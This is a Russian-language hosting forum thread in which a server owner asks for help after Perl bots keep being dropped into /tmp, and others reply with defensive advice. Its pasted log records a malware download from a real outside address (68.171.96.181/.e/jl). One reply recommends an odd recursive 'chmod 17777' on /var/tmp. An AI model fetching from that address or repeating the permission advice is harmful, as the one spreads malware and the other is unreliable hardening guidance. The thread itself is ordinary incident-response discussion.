% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0
100 4802 100 4802 0 0 1060 0 0:00:04 0:00:04 --:--:-- 1109
--2015-07-22 11:01:09-- http://68.171.96.181/.e/jl
Connecting to 68.171.96.181:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4802 (4.7K) [text/plain]
Saving to: `jl'

0K .... 100% 23.3K=0.2s

2015-07-22 11:01:10 (23.3 KB/s) - `jl' saved [4802/4802]

[Wed Jul 22 11:30:53 2015] [warn] child process 25515 still did not exit, sending a SIGTERM
[Wed Jul 22 11:30:53 2015] [warn] child process 25317 still did not exit, sending a SIGTERM
[Wed Jul 22 11:30:55 2015] [warn] child process 25515 still did not exit, sending a SIGTERM
[Wed Jul 22 11:30:55 2015] [warn] child process 25317 still did not exit, sending a SIGTERM
[Wed Jul 22 11:30:57 2015] [warn] child process 25515 still did not exit, sending a SIGTERM
[Wed Jul 22 11:30:57 2015] [warn] child process 25317 still did not exit, sending a SIGTERM
[Wed Jul 22 11:30:59 2015] [error] child process 25515 still did not exit, sending a SIGKILL
[Wed Jul 22 11:30:59 2015] [error] child process 25317 still did not exit, sending a SIGKILL
[Wed Jul 22 11:31:00 2015] [notice] caught SIGTERM, shutting down
[Wed Jul 22 11:31:00 2015] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec)
[Wed Jul 22 11:31:00 2015] [notice] mod_ruid2/0.9.7 enabled
[Wed Jul 22 11:31:00 2015] [notice] Apache/2.2.22 (Debian) mod_fcgid/2.3.6 PHP/5.4.41-0+deb7u1 mod_ssl/2.2.22 OpenSSL/1.0.1e configured -- resuming normal operations

Видно процесс загрузки гадости. Откуда и как? Перл боты лежат под владельцем "admin".
Вот как выглядит запуск перботов на графике:

(всплеск)

Читал я про шеллшок баш. Обновил баш, вроде больше не уязвим. Но все продолжается. Уже надоело их удалять и убивать процессы.

Post by **skurudo** » Wed Jul 22, 2015 11:12 am

Енто конечно все печально, но деваться некуда. Нужно обновить все софты, сменить пароли... как знаете, молиться-поститься-слушать радио Радонеж. Но в данном случае искать точку входа. Через скрипты или через что пришло-то. Но начать нужно именно с обновления софтов на сервере и смены паролей. Далее проверять пользовательские скрипты, обновить по возможности.

Про темпы:

Code: Select all

chmod -R 17777 /var/tmp

matthew · Post by **matthew** » Wed Jul 22, 2015 12:38 pm

skurudo wrote:Енто конечно все печально, но деваться некуда. Нужно обновить все софты, сменить пароли... как знаете, молиться-поститься-слушать радио Радонеж. Но в данном случае искать точку входа. Через скрипты или через что пришло-то. Но начать нужно именно с обновления софтов на сервере и смены паролей. Далее проверять пользовательские скрипты, обновить по возможности.

Про темпы:
Code: Select all
chmod -R 17777 /var/tmp

Вот про темпы ничего не понял, что имели ввиду.

все что можно только делал.
apt-get update
apt-get upgrade

Все новое.
Все пароли 5 раз сменил и от рута и от админа. Что еще можно сделать? Как такое возможно, что прямо в темп кладут перл боты и запускают их?
Что можно предпринять, что бы найти дырку?

Post by **skurudo** » Wed Jul 22, 2015 12:57 pm

Вот про темпы ничего не понял, что имели ввиду.
Имел в виду - раздайте разрешения и посмотрите

Code: Select all

ls -la /var/tmp/

Смотреть логи в /var/log - искать подозрительное и левые адреса
Возможно добавляется через уязвимость скриптов - воспользуйтесь maldet / manul или чем-то таким.

matthew · Post by **matthew** » Thu Jul 23, 2015 6:55 am

skurudo wrote:Вот про темпы ничего не понял, что имели ввиду.
Имел в виду - раздайте разрешения и посмотрите
Code: Select all
ls -la /var/tmp/
Смотреть логи в /var/log - искать подозрительное и левые адреса
Возможно добавляется через уязвимость скриптов - воспользуйтесь maldet / manul или чем-то таким.

Да причем здесь /var/tmp/, я же написал, что выставил права на эту папку в 755 и ее больше не трогают. Теперь боевые действия в /tmp, но на нее нельзя ставить 755.

/var/log уже весь просмотрел. Мне ничего это не говорит. Ну есть там ip и адреса с которых льют ботов мне на сервер. Но как их льют не понятно. Кроме голой debian, nodejs и vestacp больше ничего нет.

Post by **skurudo** » Thu Jul 23, 2015 6:59 am

matthew wrote:Да причем здесь /var/tmp/, я же написал, что выставил права на эту папку в 755 и ее больше не трогают. Теперь боевые действия в /tmp, но на нее нельзя ставить 755.

Чтобы посмотреть от какого пользователя и когда.

matthew wrote:/var/log уже весь просмотрел. Мне ничего это не говорит. Ну есть там ip и адреса с которых льют ботов мне на сервер. Но как их льют не понятно. Кроме голой debian, nodejs и vestacp больше ничего нет.

Есть же дата создания, айпишник - посмотреть nginx access логи, что за запросы были с этого адрес.
Я не говорю, что это просто - это кропотливая работа по поиску уязвимости в скриптах по всей видимости.

Post by **imperio** » Thu Jul 23, 2015 7:00 pm

Забекапьте скрипты сайтов и удалите их с сервера, что бы исключить или подтвердить возможную уязвимость через них, или попробуйте засуспендить. Это первый шаг для нахождения уязвимости.
Сайты то не под системным пользователем admin ?

matthew · Post by **matthew** » Mon Jul 27, 2015 6:00 am

skurudo wrote:
matthew wrote:Да причем здесь /var/tmp/, я же написал, что выставил права на эту папку в 755 и ее больше не трогают. Теперь боевые действия в /tmp, но на нее нельзя ставить 755.
Чтобы посмотреть от какого пользователя и когда.

matthew wrote:/var/log уже весь просмотрел. Мне ничего это не говорит. Ну есть там ip и адреса с которых льют ботов мне на сервер. Но как их льют не понятно. Кроме голой debian, nodejs и vestacp больше ничего нет.
Есть же дата создания, айпишник - посмотреть nginx access логи, что за запросы были с этого адрес.
Я не говорю, что это просто - это кропотливая работа по поиску уязвимости в скриптах по всей видимости.

Я же говорил. Создается гадость под пользователем "admin". За дня 1-2 до начала своей активности.

На сервере проблема с логами, почему-то везде пишется ip сервера и ничей другой. Почти во всех логах.

matthew · Post by **matthew** » Mon Jul 27, 2015 6:02 am

imperio wrote:Забекапьте скрипты сайтов и удалите их с сервера, что бы исключить или подтвердить возможную уязвимость через них, или попробуйте засуспендить. Это первый шаг для нахождения уязвимости.
Сайты то не под системным пользователем admin ?

На всем сервере только 1 сайт. Его нельзя ни в коем случае вырубать или останавливать. И да, он под админом(

Post by **imperio** » Mon Jul 27, 2015 7:16 am

В целях безопасности мы всегода рекомендуем создавать сайты под другим юзером.

Vesta Control Panel - Forum

Возможно дырка в веб-сервере?

Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Re: Возможно дырка в веб-сервере?

Login • Register